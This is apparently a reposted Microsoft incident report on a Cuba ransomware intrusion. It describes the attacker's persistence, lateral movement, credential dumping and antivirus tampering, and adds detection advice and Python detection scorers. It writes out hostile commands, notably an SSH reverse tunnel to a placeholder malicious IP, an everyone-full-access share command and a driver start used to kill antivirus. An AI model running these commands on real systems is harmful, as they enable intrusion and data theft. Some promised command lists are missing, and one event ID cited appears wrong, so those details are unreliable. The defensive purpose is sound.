One of the most common threats the Microsoft Detection and Response Team (DART) now responds to is ransomware. As network security postures improve, the groups behind these attacks continue to refine their tactics, techniques, and procedures (TTPs).
This blog post discusses a recent ransomware investigation in which the attacker launched their malicious code using a variety of common tools and methods, such as living-off-the-land binaries. After the compromised accounts’ passwords were reset, Cobalt Strike was used to maintain access to the network with NT AUTHORITY\SYSTEM (local SYSTEM) rights.
This case shows how an attacker can remain on a network for a very long time before releasing ransomware. The post goes through the methods used as well as the suggested defense and detection strategies that customers can adopt to better protect themselves against these kinds of attacks.
Because of the age of the attack, the short retention period of the security solutions, the reimaging of encrypted devices before analysis, and other factors, DART was unable to identify the initial entry vector of this attack. The actor already had domain administrator access when the activity was first discovered.
During its analysis of this engagement, DART found multiple instances of scheduled tasks and services being created by the attacker for persistence after they had obtained highly privileged credentials. Services and scheduled tasks can run malicious code with extremely privileged access when they are configured to run as NT AUTHORITY\SYSTEM.
Cobalt Strike was observed spreading throughout the network, on servers, domain controllers, and admin workstations. To persist their payload, the attacker created Windows services that executed rundll32 to load the Cobalt Strike DLL by calling the “AllocConsole” exported function of a variant of the Termite family of malware. These services were seen running under both SYSTEM and domain administrator credentials. Crimeware groups commonly use Termite malware to load Cobalt Strike and evade antivirus detection.
The Cobalt Strike DLLs were located in C:\Windows\Temp and were named using the first and last octets of the command and control (C2) address. After the attacker had installed it on a domain controller, the malware was spread by a PowerShell script that copied the Cobalt Strike DLL to C:\Windows\Temp over SMB and then executed it by installing a remote service.
By creating a service, the actor elevated their privileges to “NT AUTHORITY\SYSTEM”. This service was probably created with Cobalt Strike and had a pseudorandom service name such as “4aedb00”.
To maintain persistence on important servers, such as domain controllers and domain administrator workstations, the actor installed OpenSSH on the client’s network. Instead of using the default OpenSSH path under System32, the actor installed it under C:\Windows\OpenSSH.
Running as “NT AUTHORITY\System”, the attacker set up a scheduled task to maintain an SSH connection to their C2. Instead of TCP 22, the usual port for SSH, the attacker used TCP 443. Outbound TCP 22 may be blocked in many enterprises, whereas TCP 443 is usually open because it carries web traffic. The attacker also enabled port forwarding on TCP 7878 so that malicious tools could be tunneled through the SSH connection.
Additionally, the attacker was seen renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in an obvious attempt to avoid detection.
Four days after the ransomware was deployed, the attacker used their existing OpenSSH persistence to regain access to the compromised network and installed further persistent SSH services on additional domain controllers and domain administrator workstations.
To transfer files between their C2 and the compromised host, the attacker used the sftp-server component of OpenSSH. On compromised hosts, the actor generated SSH keys with ssh-keygen.exe, a component of the OpenSSH toolset. After the credentials had been reset, the attacker was still able to SSH in using the keys rather than the credentials.
During the initial stages of the compromise, Impacket’s WMI modules were used for remote execution and discovery. Impacket is an open-source library of scripts for interacting with network protocols. Many crimeware groups have recently used this toolset for network reconnaissance and lateral movement.
Through Impacket, the attacker executed PowerShell scripts from “C:\Perflogs\”, which created .txt files in the same path. Each command executed with Impacket writes its output to “\\127.0.0.1\ADMIN$\_1648051380.61”. After the PowerShell scripts and text files had been run, the attacker deleted them all.
Before deploying Cobalt Strike on a device, the actor used Impacket to check whether the target server could reach the attacker’s C2.
The actor used PsExec.exe to distribute the ransomware throughout the victim’s network. First, the attacker ran “open.bat”, which in turn ran “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL”. This shared every drive on the host with full access for everyone. The Cuba ransomware was observed under the names “A.exe”, “Anet.exe”, and “Aus.exe”.
The main lateral movement technique the attacker employed in this incident was Remote Desktop Protocol (RDP), which gave them a GUI environment to change system settings and install malware. The attacker also used Impacket and PsExec for lateral movement and remote code execution. The attacker used domain administrator accounts to RDP between devices.
Early in the compromise, the attacker used WDigest to cache credentials, which allowed them to obtain domain administrator credentials.
When enabled, the Windows WDigest feature caches logon credentials in clear text. Credential access tools such as Mimikatz commonly abuse this. To determine whether WDigest is enabled on your network, check whether the registry value HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential is set to 1. Setting the value to 0 disables it.
The attacker obtained the Active Directory database (NTDS.dit) twice: first five months into the compromise, and again four days after the ransomware was deployed. The attacker produced the copy of the NTDS.dit with the native ntdsutil.exe application, which copied the .dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”.
The attacker also created a volume shadow copy of a domain controller with “vssadmin” and used it to access the Active Directory database. This technique produces a static copy of system files that a user normally cannot access because they are in use. After creating the volume shadow copy, the attacker copied the NTDS.dit, SYSTEM hive, and SECURITY hive to C:\Windows\ so they could later be copied remotely through the ADMIN$ share.
Before exfiltration, the attacker was seen compressing files with 7-Zip. 7z.exe was launched from C:\Windows\Temp. The attacker used the device’s hostname as the archive name and did not protect it with a password (for example, DC01.7z).
To exfiltrate network shares to a C2 under the attacker’s control, the attacker used PuTTY Secure Copy (PSCP). This copy of PSCP had been renamed “lsas.exe” in an attempt to masquerade as the legitimate LSASS process. PSCP was run from the C:\Windows\Temp directory. The attacker specifically targeted personnel and financial data.
After files had been quarantined by antivirus, the attacker turned off Microsoft Defender Antivirus on some devices. While connected to the device through RDP, the attacker disabled Microsoft Defender Antivirus using the Windows Security GUI.
The attacker also used an Avast anti-rootkit driver. In a recent blog post, Unit 42 described how the Cuba ransomware group has used this driver to disable antivirus software before distributing the ransomware.
Using the “sc” command, the actor installed the driver, giving themselves kernel-level access. The actor then ran “sc start aswSP-ArPot2” to start the service. Through this service the actor obtained the kernel privileges needed to disable the victim’s antivirus software. Disabling antivirus on the victim network ensured that the ransomware would not be contained or stopped from spreading.
The attacker also created benign-looking binaries that exploited the driver’s vulnerability. These binaries passed each executable name from a list of popular antivirus programs to the driver via control code 0x9988C094, asking the driver to terminate those processes.
The attacker was also observed using standard system enumeration commands. Although these commands are benign individually, in combination they can often be used to detect an unauthorized user enumerating the system.
The attacker was seen running the following commands:
As we see more attacks using techniques similar to those in this post, organizations must make sure they follow security practices to protect their servers. The monitoring recommendations that businesses should adopt as part of their detection strategy are listed below.
Service creation events should be monitored for anomalies. A high-severity alert should fire when an administrator account creates a service that runs as SYSTEM, since this common privilege escalation technique can be carried out in a number of ways, including through service creation.
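As an added example (not code from the original post or from Microsoft), the scorer below applies the service-account check from this paragraph together with the unusual-path, driver and masquerading checks from the paragraphs that follow to service-creation records. The event field names, the anomalous-directory list and the sample events are constructed to mirror the activity described in the post; map them onto your own System 7045 / Security 4697 events or EDR telemetry.

```python
# Added example (not from the original post): a scorer for service-creation
# records that flags the patterns described above. The event fields, the
# directory list and the sample events are constructed; map them onto your
# own System 7045 / Security 4697 events or EDR telemetry.
import re

SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system"}
SYSTEM_CREATORS = {"system", "nt authority\\system"}
# Directories a legitimate service binary or driver rarely runs from (assumed list),
# and system binary names that a file outside System32 may borrow to masquerade.
ANOMALOUS_DIRS = ("c:/windows/temp", "c:/perflogs", "c:/programdata", "c:/users/", "c:/windows/openssh")
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe"}

def _split_image(image_path):
    """Return (normalised full ImagePath, path of the binary itself without arguments)."""
    path = image_path.lower().replace("\\", "/")
    m = re.match(r'"([^"]+)"|(\S+)', path)
    return path, ((m.group(1) or m.group(2)) if m else "")

def score_service_creation(ev):
    """Return (score, reasons); each heuristic adds one point. Alert on >= 2."""
    reasons = []
    path, exe = _split_image(ev["image_path"])
    exe_name = exe.rsplit("/", 1)[-1]
    if ev["service_account"].lower() in SYSTEM_ACCOUNTS and ev["subject_user"].lower() not in SYSTEM_CREATORS:
        reasons.append("SYSTEM service created by an interactive/admin account")
    in_bad_dir = any(d in path for d in ANOMALOUS_DIRS)
    if in_bad_dir:
        reasons.append("binary or argument path in anomalous directory")
    if in_bad_dir and ev["service_type"].lower() == "kernel mode driver":
        reasons.append("driver loaded from anomalous directory (even if signed)")
    if exe_name == "rundll32.exe":
        reasons.append("service body is rundll32 loading a DLL")
    if exe_name in SYSTEM_BINARY_NAMES and not exe.startswith("c:/windows/system32/"):
        reasons.append("system binary name outside System32 (masquerading)")
    if re.fullmatch(r"[0-9a-f]{6,8}", ev["service_name"].lower()):
        reasons.append("pseudorandom hex service name")
    return len(reasons), reasons

# Constructed sample events modelled on the activity described in the post.
SAMPLE_EVENTS = [
    {"service_name": "4aedb00", "service_account": "LocalSystem", "service_type": "user mode service",
     "subject_user": "CONTOSO\\da-admin", "image_path": r"C:\Windows\rundll32.exe C:\Windows\Temp\10.57.dll,AllocConsole"},
    {"service_name": "aswSP-ArPot2", "service_account": "", "service_type": "kernel mode driver",
     "subject_user": "CONTOSO\\da-admin", "image_path": r"C:\Windows\Temp\aswArPot.sys"},  # driver path assumed
    {"service_name": "sshsvc", "service_account": "LocalSystem", "service_type": "user mode service",
     "subject_user": "CONTOSO\\da-admin", "image_path": r"C:\Windows\OpenSSH\svchost.exe -N -p 443"},
    {"service_name": "ContosoBackup", "service_account": "LocalSystem", "service_type": "user mode service",
     "subject_user": "SYSTEM", "image_path": r'"C:\Program Files\Contoso Backup\agent.exe"'},
]
```

Running `score_service_creation` over `SAMPLE_EVENTS` scores the Cobalt Strike loader service 4, the driver 2, the renamed ssh service 3 and the ordinary backup agent 0.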
It is also important to watch for unusual executables or paths when new services are created. Drivers loaded from such unusual paths should receive high-priority alerts: even if the driver is properly signed, its location may indicate malicious use. Anomalous paths can take many forms, including but not limited to:
Microsoft recommends monitoring for unauthorized SSH installations and usage in your network. Running SSH as “NT AUTHORITY\System” is not recommended.
The actor used the following SSH command line in this incident. Monitoring for similar activity in your environment is recommended:
ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
Because the actor tried to hide the SSH process as “svchost.exe”, monitoring for this command line under other process names can reveal process masquerading.
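The following is an added example, not code from the original post: it parses an OpenSSH client command line like the one above and scores it, together with the process image path and the account it runs under, for the traits this section describes (non-standard port, reverse tunnel, no remote command, disabled host key checking, renamed binary, SYSTEM account). The two process records, the “contoso” user and the 203.0.113.10 address are constructed placeholders.

```python
# Added example (not from the original post): parse an OpenSSH client command
# line like the one above and score it, together with the process image and
# account, for the tunnelling and persistence traits described in the post.
# The process records, "contoso" and the 203.0.113.10 address are constructed.
FLAGS_WITH_VALUE = {"-p", "-i", "-R", "-L", "-D", "-o", "-l", "-J", "-F", "-W"}
EXPECTED_SSH_DIRS = ("c:/windows/system32/openssh/", "c:/program files/openssh/")

def parse_ssh_cmdline(cmdline):
    """Extract the ssh options that matter for detection (port, -i, -R, -o, -N, target)."""
    out = {"port": 22, "identity": None, "reverse": [], "options": {}, "no_command": False, "target": None}
    toks, i = cmdline.split()[1:], 0  # drop the executable name itself
    while i < len(toks):
        t, val = toks[i], (toks[i + 1] if i + 1 < len(toks) else "")
        if t in FLAGS_WITH_VALUE:
            if t == "-p" and val.isdigit(): out["port"] = int(val)
            elif t == "-i": out["identity"] = val
            elif t == "-R": out["reverse"].append(val)
            elif t == "-o": k, _, v = val.partition("="); out["options"][k] = v
            i += 2
        else:
            if t == "-N": out["no_command"] = True
            elif not t.startswith("-") and out["target"] is None: out["target"] = t  # [user@]host
            i += 1
    return out

def score_ssh_process(rec):
    """rec: {'image', 'user', 'command_line'} from a process-creation event; returns findings."""
    p = parse_ssh_cmdline(rec["command_line"])
    image = rec["image"].lower().replace("\\", "/")
    checks = [
        (image.rsplit("/", 1)[-1] != "ssh.exe", "ssh client running under another process name (masquerading)"),
        (not image.startswith(EXPECTED_SSH_DIRS), "ssh binary outside the expected OpenSSH install paths"),
        (rec["user"].lower() == "nt authority\\system", "ssh running as NT AUTHORITY\\SYSTEM"),
        (p["port"] != 22, f"non-standard SSH port {p['port']}"),
        (bool(p["reverse"]), "reverse port forwarding (-R): the remote end can reach into the host"),
        (p["no_command"], "-N: tunnel only, no remote command executed"),
        (p["options"].get("StrictHostKeyChecking", "").lower() == "no", "host key checking disabled"),
        (bool(p["identity"]) and "programdata" in p["identity"].lower(), "identity key stored under ProgramData"),
    ]
    return [msg for hit, msg in checks if hit]

# Constructed records: the renamed ssh.exe from the post, and a routine admin session for contrast.
SUSPECT_SSH = {"image": r"C:\Windows\OpenSSH\svchost.exe", "user": "NT AUTHORITY\\SYSTEM",
               "command_line": r"svchost.exe contoso@203.0.113.10 -p 443 -i C:\ProgramData\ssh\id_ed25519 "
                               r"-R 203.0.113.10:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no"}
BENIGN_SSH = {"image": r"C:\Windows\System32\OpenSSH\ssh.exe", "user": "CONTOSO\\jdoe",
              "command_line": "ssh.exe jdoe@build01.contoso.example"}
```

`score_ssh_process(SUSPECT_SSH)` returns all eight findings, while the routine session returns none.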
Microsoft recommends monitoring for remote share access from the command prompt. The attacker frequently used this method to move files around the network.
Microsoft Defender for Endpoint raises an alert when the command prompt makes a remote share request. This also applies to Impacket commands that target the localhost ADMIN$ share. Monitoring these alerts in your network can help you identify unauthorized access.
Organizations should pay close attention to PsExec usage. Suggested detection methods include:
Monitoring for each stage of PsExec can help detect unauthorized variants in your network, because the techniques PsExec uses are simple to replicate, either with off-the-shelf tools or with a custom toolset built on the Windows API. PsExec works in three stages:
Monitoring for executable files written to administrative shares can help identify lateral movement attempts. This can involve watching for native command lines, such as copy, that target remote shares like the ones mentioned earlier. DeviceFileEvents in Defender for Endpoint can be used to track file creation events that arrive over Server Message Block (SMB). Because SMB is handled in the kernel, ntoskrnl.exe will appear as the process that created the executable file, and the ShareName column will be set to ADMIN$.
Network administrators should watch for unexpected remote connections to port 135 (RPC), which a process can use to remotely create and start services. Defender for Endpoint’s Advanced Hunting can help identify unusual connections on port 135 using the summarize and sort operators. The KQL below can be used as a starting point for finding anomalous connections:
DeviceNetworkEvents
| where RemotePort == 135
| summarize count() by InitiatingProcessFileName
| sort by count_ asc
This technique can also be replicated by creating remote services over named pipes. A remote actor can connect to the IPC$ share and open the svcctl named pipe to launch a service remotely. Similar detections apply here, but the traffic will go over port 445 to the IPC$ share.
The RPC connection causes a service to be created on the destination host. Monitor for unauthorized service creation by recording 4679 events in the System event log.
Remote named pipe traffic can be monitored by watching for the named pipe created on the target server: PsExeSvc.exe creates the PSEXESVC pipe, and the source device connects to it through the IPC$ share. Because that connection arrives over SMB, ntoskrnl.exe will appear as the client connecting to the pipe.
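As an added example (not code from the original post), the correlator below ties the PsExec stages described above (RPC or SMB connection, executable written to ADMIN$ by ntoskrnl.exe, service creation, PSEXESVC pipe connection over IPC$) together per destination host, and also catches a renamed or custom clone by checking whether the new service runs the binary that was just dropped. Service-creation events carry no remote address, so the chain is keyed on the host; the event schema, host names and sample window are constructed, and the three-stage threshold is an assumption.

```python
# Added example (not from the original post): correlate the PsExec-style stages
# described above (RPC/SMB connection, executable written to ADMIN$ by
# ntoskrnl.exe, service creation, PSEXESVC pipe connect over IPC$) per
# destination host. Service-creation events carry no remote address, so the
# chain is keyed on the host and the sources come from the other stages. The
# caller passes events from one short time window; schema and samples are constructed.
from collections import defaultdict

def _stage(ev):
    """Map one telemetry record to a PsExec stage name, or None if it is not one."""
    t = ev["type"]
    if t == "net" and ev["remote_port"] in (135, 445):
        return "connect"
    if (t == "file" and ev["initiating_process"].lower() == "ntoskrnl.exe"
            and ev["share"].upper() == "ADMIN$" and ev["file"].lower().endswith(".exe")):
        return "drop"
    if t == "service":
        return "service"
    if t == "pipe" and ev["share"].upper() == "IPC$" and ev["pipe"].upper() == "PSEXESVC":
        return "pipe"
    return None

def correlate_psexec(events, min_stages=3):
    """Return {host: chain} for hosts whose events complete >= min_stages distinct stages."""
    chains = defaultdict(lambda: {"stages": set(), "sources": set(), "files": set()})
    for ev in sorted(events, key=lambda e: e["ts"]):
        st = _stage(ev)
        if st is None:
            continue
        c = chains[ev["host"]]
        c["stages"].add(st)
        if "src" in ev:
            c["sources"].add(ev["src"])
        if st == "drop":
            c["files"].add(ev["file"].lower())
        # a renamed or custom PsExec clone still runs the binary it just dropped
        if st == "service" and ev["image"].lower().rsplit("\\", 1)[-1] in c["files"]:
            c["stages"].add("runs-dropped-exe")
    return {h: c for h, c in chains.items() if len(c["stages"]) >= min_stages}

# Constructed window: stock PsExec against DC01, a renamed clone (no PSEXESVC pipe) against SRV02, plain share traffic to FS01.
SAMPLE_WINDOW = [
    {"ts": 0, "type": "net", "host": "DC01", "src": "ADMIN-WS01", "remote_port": 445},
    {"ts": 2, "type": "file", "host": "DC01", "src": "ADMIN-WS01", "initiating_process": "ntoskrnl.exe", "share": "ADMIN$", "file": "PSEXESVC.exe"},
    {"ts": 3, "type": "service", "host": "DC01", "name": "PSEXESVC", "image": r"C:\Windows\PSEXESVC.exe"},
    {"ts": 4, "type": "pipe", "host": "DC01", "src": "ADMIN-WS01", "share": "IPC$", "pipe": "PSEXESVC"},
    {"ts": 30, "type": "net", "host": "SRV02", "src": "ADMIN-WS01", "remote_port": 135},
    {"ts": 31, "type": "file", "host": "SRV02", "src": "ADMIN-WS01", "initiating_process": "ntoskrnl.exe", "share": "ADMIN$", "file": "svcx.exe"},
    {"ts": 32, "type": "service", "host": "SRV02", "name": "svcx", "image": r"C:\Windows\svcx.exe"},
    {"ts": 40, "type": "net", "host": "FS01", "src": "ADMIN-WS01", "remote_port": 445},
]
```

`correlate_psexec(SAMPLE_WINDOW)` reports DC01 and SRV02 (the latter without the pipe stage) and ignores FS01, whose single SMB connection is not enough on its own.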
Monitor for malicious use of ntdsutil, which actors can use to obtain the NTDS.dit. The command in the NTDS.dit dumping section shows how the actor copied the NTDS.dit with this tool. The only part of that command that changes between executions is the path, which can be monitored. There are few legitimate reasons to make a complete copy of the NTDS.dit.
Defender for Endpoint raises alerts when the NTDS.dit is dumped, and these alerts should be resolved immediately. Monitoring for unauthorized use of “ntdsutil” is also strongly advised.
If file monitoring is enabled on your network, alerting on the creation of new .dit files can also help identify potential NTDS.dit dumping. The attacker was seen copying the NTDS.dit from a volume shadow copy.
Organizations should pay attention to and respond to antivirus and endpoint detection and response (EDR) alerts that indicate antivirus has been turned off or tampered with. Tamper protection should be enabled wherever possible to stop actors from tampering with or disabling antivirus software.
Microsoft Defender Antivirus logs events for product tampering attempts, such as Real-Time Protection being disabled (Event ID: 5001). An alert is also raised in the Defender for Endpoint portal, where it can be prioritized further using the advanced hunting interface. Monitoring for use of the relevant Windows PowerShell cmdlet can also help detect antivirus tampering.
DART was able to identify the actor’s RDP connections through anomalous connection patterns, including the following:
Investigations of domain and enterprise administrator logons should look for unusual connections, such as those originating from edge servers or going to servers the account does not usually manage. Administrator accounts should be protected with multifactor authentication (MFA).
Ransomware groups continue to become more effective through longer dwell times before encryption, multiple kinds of persistent access, and the use of legitimate signed binaries. Some of these groups return to the network after encryption to make sure they keep a foothold. These groups continue to target sensitive data for exfiltration.
Organizations must remain alert to these TTPs and to anomalous activity. The Cuba ransomware group used a wide range of evasion techniques to avoid detection by antivirus software, which calls for shifting the focus from traditional malicious-file detection toward anomaly and behavioral detection when hunting in the network. Remote execution and access tools such as PsExec and SSH should be audited regularly.
Microsoft recommends concentrating on the following steps to improve the security of your network:
Here at CourseMonster, we know how hard it can be to find the right time and funds for training. We provide effective training programs that let you select the training option that best meets the demands of your company.
For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com